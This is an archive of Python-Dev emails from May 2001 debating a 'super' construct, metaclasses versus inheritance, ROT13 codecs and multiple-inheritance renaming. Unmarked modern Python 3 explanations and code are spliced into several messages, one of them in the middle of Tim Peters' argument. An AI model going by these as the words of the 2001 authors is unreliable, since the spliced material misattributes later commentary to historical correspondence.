remind one of C++ so much... I have an idea! How about spelling super(self, MyBaseClass) as MyBaseClass[self] This can be thought of as a sort of "cast" which turns self into an object which behaves like it were an instance of MyBaseClass. 
Then we can write

  MyBaseClass[self].foo(args)

Advantages:
  * Concise and uncluttered
  * No new syntax needed
  * Can be implemented using existing mechanisms
  * Doesn't even remotely resemble anything in C++ :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+

From tim.one@home.com Thu May 3 06:49:04 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID:

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about. In

    class A(B, C):
        def foo(self):
            super.foo()

Guido said that super would start searching at B, but I don't know what your "continue the search for the method as if it hadn't found the occurrence calling the basemethod() API" means: defining what a thing does in terms of an unspecified API it doesn't use is a pretty sure recipe for compounded confusion.

Given that we're using Python's search rules, the ambiguous point remaining is whether:

    super.f()

textually contained in a method of class K begins searching with:

1) K.__bases__

or with:

2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would too. But it's unclear whether he meant that. Given also

    class D(A):
        def foo(self):
            super.foo()

    D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes A.foo() next.
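For comparison, the rule Python eventually adopted matches neither option exactly. This applies to super() from Python 2.2 on and to its zero-argument form in Python 3. The search walks the method resolution order of the instance's class, type(self).__mro__, but starts just after the class K whose method makes the call. The sketch below uses the class names from this message. The bodies given to B and C are assumed for illustration, and the calls list only records execution order.

```python
calls = []  # records the order in which the foo() implementations run

class B:
    def foo(self):
        calls.append("B")
        super().foo()  # for a D instance, the next class in D.__mro__ is C

class C:
    def foo(self):
        calls.append("C")  # end of the chain: object has no foo()

class A(B, C):
    def foo(self):
        calls.append("A")
        super().foo()  # searches type(self).__mro__, starting just after A

class D(A):
    def foo(self):
        calls.append("D")
        super().foo()  # starts just after D

D().foo()
print([k.__name__ for k in D.__mro__])  # ['D', 'A', 'B', 'C', 'object']
print(calls)                            # ['D', 'A', 'B', 'C']
```

B's super() call lands in C, a class B does not inherit from. The next method therefore depends on the instance, as in #2. Starting after the calling class, as in #1, is what keeps A.foo() from calling itself again.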
But under #1 A.foo() invokes B.foo() or C.foo() next, while under #2 A.foo() invokes A.foo() again. Multiple inheritance is a red herring here -- take C out of A's bases, and the same ambiguity needs to be resolved.

From greg@cosc.canterbury.ac.nz Thu May 3 06:56:07 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To:
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:
> Java uses #1, and Guido's "the search starts with B" implies that he would
> too. But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.

Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+

From pf@artcom-gmbh.de Thu May 3 07:29:03 2001
From: pf@artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001 3:39: 8 pm"
Message-ID:

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
>
>   MyBaseClass[self]
>
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
>
>   MyBaseClass[self].foo(args)
>
> Advantages:
>   * Concise and uncluttered
>   * No new syntax needed
>   * Can be implemented using existing mechanisms
>   * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
  * People will confuse this with calling MyBaseClass.__getitem__(....)
  * Doesn't even remotely resemble anything in C++

We have to face it: I myself don't like C++ either, but a *lot* of people today are already familiar with C++ today.
Giving them something they are already familiar with will make it easier to convert some of them to Python.

To Greg: This '::' operator is not at all that ugly and AFAI can see would not introduce any backward incompatible change to the language. I'm sure C++ has some other real warts to offer that we both don't want to see in a future version of Python. Right?

Regards, Peter
--
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)

From mal@lemburg.com Thu May 3 08:49:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
>
> "M.-A. Lemburg" :
>
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
>
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
>
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting from meta-classes. DictType is a creation of the meta-class TypeType. I'm not calling these instances to prevent additional confusion. The root of the problem is that for some reason there is a belief that DictType should implicitly inherit attributes and methods from TypeType. If we simply say that there is no implicit inheritance (only explicit one), then these problems should go away. Some of these ideas are buried in the "super" part of this thread.
Unfortunately this concept doesn't go very far since Python has multiple inheritance and thus the term "super" (referring to the class' single base class) is not well-defined. As Jim mentioned in his reply to Thomas' question, SmallTalk has two parallel hierarchies. One for the classes and one for the meta-classes. If we follow the same path in Python and keep the two well separated, I think we can resolve many of the issues which are currently showing up. To link the two hierarchies together we don't need a "super" concept, but instead a way to reach the meta-class in charge of a class, say "klass.__creator__". Note that there's another issue hiding in all this and again this is due to multiple inheritance: which meta-class is in charge of a class which is derived from two classes having different meta-classes ? meta1 --> o klass1 o klass1a o klass1b meta2 --> o klass2 o klass2a o klass2b class klass3(klass1a, klass2b): ... I think there's no clean way to resolve this, so I'd suggest to simply rule this out and declare it illegal (class can only be based on classes having the same meta-class). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry@digicool.com Thu May 3 09:24:16 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 3 May 2001 04:24:16 -0400 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <15089.5552.164307.344721@anthem.wooz.org> >>>>> "M" == M writes: M> Here's a little fun codec to play with. It encodes the input M> using the ROT13 encoding (which is 1-1 and idempotent). LOL! 
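To make the codec discussion concrete, here is a minimal sketch in modern Python 3 rather than the 2001 codebase. It builds ROT13 with `str.maketrans`, registers it through `codecs.register` under a made-up codec name, `rot13_sketch`, and checks that applying it twice gives back the input (ROT13 is its own inverse). The codec name and helper functions are assumptions of this sketch; the stdlib's `rot_13` and `hex` codecs appear only for comparison and to show a codec that maps bytes to bytes.

```python
import codecs

# Translation table shifting each ASCII letter 13 places; other characters pass through.
_UP = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_LO = _UP.lower()
_TABLE = str.maketrans(_UP + _LO, _UP[13:] + _UP[:13] + _LO[13:] + _LO[:13])


def rot13(text):
    return text.translate(_TABLE)


def _codec_func(data, errors="strict"):
    # Codec functions return (output, number of input items consumed).
    return rot13(data), len(data)


def _search(name):
    # "rot13_sketch" is a hypothetical codec name used only for this example.
    if name == "rot13_sketch":
        return codecs.CodecInfo(_codec_func, _codec_func, name="rot13_sketch")
    return None


codecs.register(_search)

message = "Hello, Python-Dev"
scrambled = codecs.encode(message, "rot13_sketch")   # 'Uryyb, Clguba-Qri'
restored = codecs.decode(scrambled, "rot13_sketch")  # the original message again

# Codecs are not limited to Unicode: the stdlib "hex" codec maps bytes to bytes.
hexified = codecs.encode(b"data", "hex")             # b'64617461'
```

Because ROT13 undoes itself, one function serves as both encoder and decoder.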
Guess what `language' I chose to use when testing Mailman's i18n support? :) -Barry From fredrik@pythonware.com Thu May 3 09:11:10 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Thu, 3 May 2001 10:11:10 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid> mal wrote: > Here's some sample output (Netscape can unscramble this BTW): heh. just discovered that outlook express can deal with this too -- but only if the message comes from the usenet. on ordinary mail, the "unscramble rot13" menu entry is disabled (too much usability testing?) maybe you could repost your secret message to comp.lang.python ;-) Cheers /F From mal@lemburg.com Thu May 3 10:05:41 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 11:05:41 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid> Message-ID: <3AF11F65.5CBF508C@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Here's some sample output (Netscape can unscramble this BTW): > > heh. just discovered that outlook express can deal with this > too -- but only if the message comes from the usenet. > > on ordinary mail, the "unscramble rot13" menu entry is disabled > (too much usability testing?) > > maybe you could repost your secret message to comp.lang.python ;-) It wasn't all that secret: I simply cut&pasted the first two paragraphs of the message through the codec. 
There was also an inaccuracy in the posting: the codec still produces Unicode (by virtue of using the charmap codec as basis). Still, it serves as nice example of what str.decode() and str.encode() can be used for and also demonstrates how easy it is to install new codecs. I think I'll repost it to c.l.p though -- with a new secret attached to it ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Thu May 3 15:26:22 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:26:22 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200." <3AF10D91.802C8555@lemburg.com> References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com> > We are actually trying to turn classes into types here :-) Yes! Wait till you see my next batch of checkins. :-) > Really, I think that we could resolve this issue by not inheriting > from meta-classes. DictType is a creation of the meta-class > TypeType. I'm not calling these instances to prevent additional > confusion. The root of the problem is that for some reason there > is belief that DictType should implicitly inherit attributes and > methods from TypeType. If we simply say that there is no implicit > inheritance (only explicit one), then these problems should go > away. Sorry, you still seem to be confused about this. As I tried to explain before, DictType does not *inherit* from TypeType, but it is an *instance* of TypeType. TypeType defines a __repr__() method for all its instances. This is needed so that repr(DictType) returns "". It is *not* inherited from TypeType! If DictType were to inherit from something, it would inherit from the (not yet existing) ObjectType. 
ObjectType would have a __repr__ method too: it returns "". But this method is overridden by DictType, so doesn't come into play. Requiring explicit inheritance (whatever that may be) won't fix the problem. > Some of these ideas are buried in the "super" part of this > thread. Unfortunately this concept doesn't go very far since > Python has multiple inheritance and thus the term "super" > (referring to the class' single base class) is not well-defined. Not true. While super can't always refer to a single class, the use of super can be completely well-defined in an unambiguous way. Given class D(A, B, C): def foo(self): super.foo(self) "super.foo" is whatever would be called in D1 if we changed the class hierarchy as follows: class D1(A, B, C): pass class D(D1): def foo(self): D1.foo(self) The problem with super is not that it isn't well-defined. Its problem is that it's not enough to do what you want. In some situations involving multiple inheritance, it can be essential to be able to "merge" methods of the same name defined in each of the base classes, e.g. class C(A, B): def save(self): A.save(self) B.save(self) So we can't use super as an argument to abandon explicitly naming the base class of base methods. Out of the proposed spellings that I can remember: B.save(self) # current Python B.__dict__['save'](self) # ditto, butt ugly B::save(self) # C++ B._.save(self) # Don Beaudry B.instanceMethods.save(self) # ??? I still like current Python best! > As Jim mentioned in his reply to Thomas' question, SmallTalk > has two parallel hierarchies. One for the classes and one for > the meta-classes. If we follow the same path in Python and > keep the two well separated, I think we can resolve many of > the issues which are currently showing up. Yeah, but this is not the path that Python has already taken (and which has been beaten further by Jim Fulton's ExtensionClasses). Python's path is "turtles all the way down". See also my old head-exploding metaclasses paper.
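Guido's D1 rewriting is what the built-in `super()` computes in Python 3. The search continues in the instance's method resolution order just past the class whose body contains the call, which is option #1 from Tim's question earlier in the thread. The sketch below uses illustrative class names. It checks that equivalence and shows why option #2, starting the search from `type(self)`, is only correct in a leaf class.

```python
class A:
    def foo(self):
        return ["A"]


class B:
    def foo(self):
        return ["B"]


class C:
    def foo(self):
        return ["C"]


class D(A, B, C):
    def foo(self):
        # Searches D's MRO starting just after D: A, B, C, object.
        return ["D"] + super().foo()


# Guido's equivalent hierarchy: "super.foo" means whatever D1.foo resolves to.
class D1(A, B, C):
    pass


class DViaD1(D1):
    def foo(self):
        return ["D"] + D1.foo(self)


# Option #2: start from type(self) instead of the enclosing class.
class Base:
    def greet(self):
        return "base"


class Middle(Base):
    def greet(self):
        return super(type(self), self).greet()  # only correct when Middle is the leaf


class Leaf(Middle):
    pass
```

`Middle().greet()` returns `'base'`. `Leaf().greet()` keeps re-entering `Middle.greet` until Python raises `RecursionError`, which is the stack overflow Donald Beaudry describes.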
> To link the two hierarchies together we don't need a "super" > concept, but instead a way to reach the meta-class in charge > of a class, say "klass.__creator__". Your confusion between the "isInstanceOf" and "isInheritedFrom" relationships seems really deep! Super relates to inheritance. Metaclasses relate to instantiation (of the class, as an instance of the metaclass). > Note that there's another issue hiding in all this and again > this is due to multiple inheritance: which meta-class is in > charge of a class which is derived from two classes having > different meta-classes ? > > meta1 --> o klass1 > o klass1a > o klass1b > meta2 --> o klass2 > o klass2a > o klass2b > > class klass3(klass1a, klass2b): > ... > > I think there's no clean way to resolve this, so I'd suggest > to simply rule this out and declare it illegal (class can > only be based on classes having the same meta-class). Unfortunately, again thanks to Jim Fulton, we can't rule this out, because this is actually used by ExtensionClasses. The rule (as I interpret it) gives the first base class control; if the first base class is a standard class, it looks if any of the other base classes are not standard classes, and if so, gives control to the first such base class. Another way to say this is that the first base class that has a non-standard metaclass gets control. (ExtensionClasses implements an additional rule where it requires all except one of the base classes to define no instance variables. This is an example of the importance of metaclasses done right: the metaclass has control over such issues. I don't think that Smalltalk's metaclasses have this much control -- you pretty much have a 1-1 correspondence between class and metaclass. 
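In current Python you can check the two relationships Guido distinguishes directly. `dict` is an *instance* of `type` but *inherits* only from `object`, and `repr(dict)` comes from `type.__repr__`, not from `dict.__repr__`. Modern Python also settles MAL's klass3 question differently from the ExtensionClass rule described above: it chooses the most derived metaclass among the bases and raises `TypeError` when the metaclasses are unrelated. This is a short sketch, and the metaclass and class names are hypothetical.

```python
# isInstanceOf vs. isInheritedFrom
dict_is_instance_of_type = isinstance(dict, type)   # True
dict_inherits_from_type = issubclass(dict, type)    # False
dict_mro = dict.__mro__                             # (dict, object)

# repr(dict) is looked up on type(dict), i.e. on the metaclass ...
class_repr = type.__repr__(dict)                    # "<class 'dict'>"
# ... while dict.__repr__ is the method for dict *instances*.
instance_repr = dict.__repr__({"a": 1})             # "{'a': 1}"


class Meta1(type):
    pass


class Meta2(type):
    pass


class Klass1(metaclass=Meta1):
    pass


class Klass2(metaclass=Meta2):
    pass


try:
    class Klass3(Klass1, Klass2):  # unrelated metaclasses
        pass
    conflict = None
except TypeError as exc:
    conflict = str(exc)            # "metaclass conflict: ..."


class Meta2b(Meta1):               # now derived from Meta1
    pass


class Klass2b(metaclass=Meta2b):
    pass


class Klass4(Klass1, Klass2b):     # the most derived metaclass, Meta2b, is chosen
    pass
```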
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 3 15:28:03 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:28:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200." <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com> > Guido: > > > Actually, I think that what's in the __dict__ is just perfect > > I was thinking of backwards compatibility for people who > are hacking the __dict__ of a class directly. Depending on how they hack it, it may still work. > If you don't care about that, the problem is simpler. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Thu May 3 15:26:51 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 3 May 2001 09:26:51 -0500 Subject: [Python-Dev] OT: CVS access through firewall via SSH Message-ID: <15089.27307.136251.862692@beluga.mojam.com> Python-dev folks, Sorry for the off-topic post, but I'm striking out on the various other sources I've located so far. Since this group seemed to have a love-hate relationship with CVS for awhile I thought maybe someone here would be able to steer me in the right direction. I have to access a CVS repository through a firewall via SSH. That is, to get to "server" I have to tunnel through "firewall" using SSH to port "nnn". Using SSH to establish an interactive session to server is no problem: ssh -p nnn firewall When I'm inside the firewall, I use a CVSROOT that looks like :pserver:montanaro@server:/cvs/projects I need to merge the two bits somehow to come up with a CVSROOT that will do the tunnel automagically. 
I've tried this: :pserver:montanaro@firewall:nnn/cvs/projects but CVS complains cvs [update aborted]: connect to firewall:2401 failed: Connection refused (port 2401 is the normal CVS port). Any suggestions or pointers? Thanks, Skip From mal@lemburg.com Thu May 3 17:08:30 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 18:08:30 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com> Message-ID: <3AF1827E.E730F5DE@lemburg.com> Guido van Rossum wrote: > > > We are actually trying to turn classes into types here :-) > > Yes! Wait till you see my next batch of checkins. :-) Looking forward to them :) BTW, can you give a good starting point into all this (code-wise and concept-wise) ? I'd like to play around with these new concepts a little to get a better feeling for the possible issues (I should have done the same for the coercion stuff a year ago: implementing mxNumber I now find that some important hooks are missing :-(). > > Really, I think that we could resolve this issue by not inheriting > > from meta-classes. DictType is a creation of the meta-class > > TypeType. I'm not calling these instances to prevent additional > > confusion. The root of the problem is that for some reason there > > is belief that DictType should implicitly inherit attributes and > > methods from TypeType. If we simply say that there is no implicit > > inheritance (only explicit one), then these problems should go > > away. > > Sorry, you still seem to be confused about this. I think it has to do with terminology: when I say "inherit" I actually mean "the lookup is forwarded to another object".
In that sense, instances inherit from their classes and classes from their base-classes: meta-class M -> o base-class A o class B o instance x = B() Meta-class M control this "inheritance scheme" and can modify it depending on its needs. Here's a scenario of what I have in mind: In the above picture, say A defines an attribute A.a which is not defined in B or as instance attribute of B(). Querying x.a would then launch this process: 1. x.a -> fails 2. M.__findattr__(x, 'a') is called to find and return the attribute 3. M.__findattr__ asks B for an attribute 'a' -> fails 4. -- " -- asks A -- " -- -> success 5. -- " -- returns the found attribute I know that this is somewhat different under the covers than what's happening now, but the Python programmer will not notice this. It most probably does not work well with the Don Beaudry hook though... so maybe I'm simply on the wrong track here. > As I tried to > explain before, DictType does not *inherit* from TypeType, but it is > an *instance* of TypeType. TypeType defines a __repr__() method for > all its instances. This is needed so that repr(DictType) returns > "". It is *not* inherited from TypeType! > > If DictType were to inherit from something, it would inherit from the > (not yet existing) ObjectType. ObjectType would have a __repr__ > method too: it returns "". > > But this method is overridden by DictType, so doesn't come into play. > > Requiring explicit inheritance (whatever that may be) won't fix the > problem. With "explicit inheritance" I meant that the programmer has to take care of passing the lookup on to the meta-class, rather than applying some magic which hooks together class and meta- class. > > Some of these ideas are burried in the "super" part of this > > thread. Unfortunately this concept doesn't go very far since > > Python has multiple inheritance and thus the term "super" > > (referring to the class' single base class) is not well-defined. > > Not true. 
While super can't always refer to a single class, the use > of super can be completely well-defined in an unambiguous way. Given > > class D(A, B, C): > def foo(self): > super.foo(self) > > "super.foo" is whatever would be called in D1 if we changed the class > hierarchy as follows: > > class D1(A, B, C): pass > class D(D1): > def foo(self): > D1.foo(self) Nice trick -- much like the "+0" trick in math ;-) > The problem with super is not that it isn't well-defined. Its problem > is that it's not enough to do what you want. In some situations > involving multiple inheritance, it can be essential to be able to > "merge" methods of the sane name defined in each of the base classes, > e.g. > > class C(A, B): > def save(self): > A.save(self) > B.save(self) > > So we can't use super as an argument to abandon explicitly naming the > base class of base methods. Out of the proposed spellings that I can > remember: > > B.save(self) # current Python > B.__dict__['save'](self) # ditto, butt ugly > B::save(self) # C++ > B._.save(self) # Don Beaudry > B.instanceMethods.save(self) # ??? > > I still like current Python best! But it doesn't help us in the very common case of mixin classes since there the method and sometimes even not the programmer will know where the basemethod to call lives. This is why I wrote the basemethod() helper: it looks up the right method at run-time and thus allows writing mixin-classes which override methods of other classes which are only known to the programmer using the mixin and not necessarily to the one writing the mixin. > > As Jim mentioned in his reply to Thomas' question, SmallTalk > > has two parallel hierarchies. One for the classes and one for > > the meta-classes. If we follow the same path in Python and > > keep the two well separated, I think we can resolve many of > > the issues which are currently showing up. 
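MAL's point about mixins is that the mixin's author cannot know which class supplies the method being overridden. A lookup done at run time handles that case. The `basemethod()` below is a hypothetical stand-in, not MAL's actual helper. It walks the instance's MRO past a given class and binds the first match, which is the same search that Python's later built-in `super(cls, obj)` performs.

```python
def basemethod(cls, obj, name):
    """Hypothetical helper: return the next `name` after `cls` in obj's MRO, bound to obj."""
    mro = type(obj).__mro__
    for klass in mro[mro.index(cls) + 1:]:
        if name in vars(klass):
            # Bind the function found in the class dictionary to obj.
            return vars(klass)[name].__get__(obj, type(obj))
    raise AttributeError(name)


class LoggingMixin:
    def save(self):
        # The mixin does not know which class provides the "real" save().
        return ["log"] + basemethod(LoggingMixin, self, "save")()


class FileStore:
    def save(self):
        return ["file"]


class DBStore:
    def save(self):
        return ["db"]


class LoggedFile(LoggingMixin, FileStore):
    pass


class LoggedDB(LoggingMixin, DBStore):
    pass
```

The same mixin calls `FileStore.save` in one combination and `DBStore.save` in the other, and neither class is named inside the mixin.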
> > Yeah, but this is not the path that Python has already taken (and > which has been beaten further by Jim Fulton's ExtensionClasses). > Python's path is "turtles all the way down". See also my old > head-exploding metaclasses paper. I know... I was under the impression, though, that a little breakage under the covers is allowed when moving from type/classes to all types. > > To link the two hierarchies together we don't need a "super" > > concept, but instead a way to reach the meta-class in charge > > of a class, say "klass.__creator__". > > Your confusion between the "isInstanceOf" and "isInheritedFrom" > relationships seems really deep! Super relates to inheritance. > Metaclasses relate to instantiation (of the class, as an instance of > the metaclass). See above... I don't like implicitly binding creation of objects with lookup paths. These two concepts don't belong together, IMHO, since they introduce restrictions which are not really necessary. (I have had some great experiences with loosely coupled object systems and don't want to miss their flexibility anymore.) > > Note that there's another issue hiding in all this and again > > this is due to multiple inheritance: which meta-class is in > > charge of a class which is derived from two classes having > > different meta-classes ? > > > > meta1 --> o klass1 > > o klass1a > > o klass1b > > meta2 --> o klass2 > > o klass2a > > o klass2b > > > > class klass3(klass1a, klass2b): > > ... > > > > I think there's no clean way to resolve this, so I'd suggest > > to simply rule this out and declare it illegal (class can > > only be based on classes having the same meta-class). > > Unfortunately, again thanks to Jim Fulton, we can't rule this out, > because this is actually used by ExtensionClasses.
The rule (as I > interpret it) gives the first base class control; if the first base > class is a standard class, it looks if any of the other base classes > are not standard classes, and if so, gives control to the first such > base class. Another way to say this is that the first base class that > has a non-standard metaclass gets control. Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't it be possible to adapt ExtensionClass to an altered scheme ? > (ExtensionClasses implements an additional rule where it requires all > except one of the base classes to define no instance variables. This > is an example of the importance of metaclasses done right: the > metaclass has control over such issues. I don't think that > Smalltalk's metaclasses have this much control -- you pretty much have > a 1-1 correspondence between class and metaclass. Right: more power to the meta-class :-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paul@pfdubois.com Thu May 3 17:24:40 2001 From: paul@pfdubois.com (Paul F. Dubois) Date: Thu, 3 May 2001 09:24:40 -0700 Subject: [Python-Dev] Multiple inheritance Message-ID: Pardon if this is brief and suggestive only, I am on deadlines. Super is a mistaken concept in multiple inheritance languages. Fortunately, Python is not brain-damaged. Its multiple inheritance model can be fixed easily to be fully capable. Here is a suggestive example of implementing the Eiffel model (the only one that is theoretically sound) using "pretend" Python syntax (keyword conservationists might like "import" where I have "rename"): 1. The simple case, X inherits from Y and in defining foo and bar needs to use Y's version: class X (Y rename foo as _sfoo, bar as _sbar ): def foo (self): self._sfoo() myfoostuff Suppose D inherits from B and C, which both inherit from A. 
A has a method a1 that is redefined in B but not in C. D wishes to use both A's version as inherited via C and B's version. class D (B rename a1 as ba1, C rename a1 as ca1): can now use self.ca1, self.a1 Renaming is also useful where you inherit from a utility class and the lingo is different in the class where you want to use it. E.g. class Window (Tree rename children as subWindows) Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. From Donald Beaudry Thu May 3 17:47:29 2001 From: Donald Beaudry (Donald Beaudry) Date: Thu, 03 May 2001 12:47:29 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: Message-ID: <200105031647.MAA25803@localhost.localdomain> "Tim Peters" wrote, > Given that we're using Python's search rules, the ambiguous point remaining > is whether: > > super.f() > > textually contained in a method of class K begins searching with: > > 1) K.__bases__ > > or with: > > 2) self.__class__.__bases__ It can only be 1. Using 2 will only be correct if you are in a method defined on a leaf class. If not in a leaf, the search will find the method you are already in... recursion is likely to terminate in a stack overflow ;) -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...So much code, so little time... From guido@digicool.com Thu May 3 19:48:19 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:48:19 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com> From guido@digicool.com Thu May 3 19:50:30 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:50:30 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
References: Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com> > Pardon if this is brief and suggestive only, I am on deadlines. No problem. We appreciate it! > Super is a mistaken concept in multiple inheritance languages. Fortunately, > Python is not brain-damaged. Its multiple inheritance model can be fixed > easily to be fully capable. > > Here is a suggestive example of implementing the Eiffel model (the only one > that is theoretically sound) using "pretend" Python syntax (keyword > conservationists might like "import" where I have "rename"): > > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): > def foo (self): > self._sfoo() > myfoostuff Nice! This is similar to Jeremy's favorite way of spelling "super": class X(Y): Yfoo = Y.foo def foo(self): self.Yfoo() myfoostuff > Suppose D inherits from B and C, which both inherit from A. > A has a method a1 that is redefined in B but not in C. > D wishes to use both A's version as inherited via C and B's version. > > class D (B rename a1 as ba1, C rename a1 as ca1): > > can now use self.ca1, self.a1 > > Renaming is also useful where you inherit from a utility class and the lingo > is different in the class where you want to use it. E.g. class Window (Tree > rename children as subWindows) > > Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. Yes. --Guido van Rossum (home page: http://www.python.org/~guido/) From jepler@inetnebr.com Thu May 3 19:17:16 2001 From: jepler@inetnebr.com (Jeff Epler) Date: Thu, 3 May 2001 13:17:16 -0500 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010503131714.D21814@inetnebr.com> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. 
